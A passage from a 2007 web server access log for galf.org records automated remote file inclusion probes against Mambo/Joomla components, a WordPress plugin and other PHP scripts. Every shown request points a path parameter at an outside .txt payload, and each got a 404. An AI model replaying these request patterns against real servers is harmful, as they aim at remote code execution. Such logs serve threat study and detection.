80.88.171.29 - - [30/Jul/2007:02:35:46 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.youngpods.org/images/data.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:02:36:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:02:36:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
82.194.66.135 - - [30/Jul/2007:02:37:00 -0700] "GET /logs/middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
82.194.66.135 - - [30/Jul/2007:02:37:00 -0700] "GET /middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:02:37:36 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
69.93.6.26 - - [30/Jul/2007:02:37:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.homedv.net/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
213.171.218.222 - - [30/Jul/2007:02:37:51 -0700] "GET /logs/middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.171.218.222 - - [30/Jul/2007:02:37:52 -0700] "GET /middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.193.249.203 - - [30/Jul/2007:02:38:39 -0700] "GET /logs/middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.249.203 - - [30/Jul/2007:02:38:40 -0700] "GET /middle.php?page=http://toxicityazoty.free.fr/pitbull/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.223.107.12 - - [30/Jul/2007:02:39:16 -0700] "GET /logs/access.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.bourreau-immobilier.com/scripts/.css/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:02:39:23 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:02:39:24 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.78.3.229 - - [30/Jul/2007:02:40:42 -0700] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
211.78.3.229 - - [30/Jul/2007:02:40:43 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
196.30.221.53 - - [30/Jul/2007:02:41:42 -0700] "GET /logs/index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
196.30.221.53 - - [30/Jul/2007:02:41:42 -0700] "GET /index.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:02:42:39 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [30/Jul/2007:02:42:42 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:02:44:10 -0700] "GET /logs/index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [30/Jul/2007:02:44:11 -0700] "GET /index.php?go=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.120.19.95 - - [30/Jul/2007:02:45:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chanar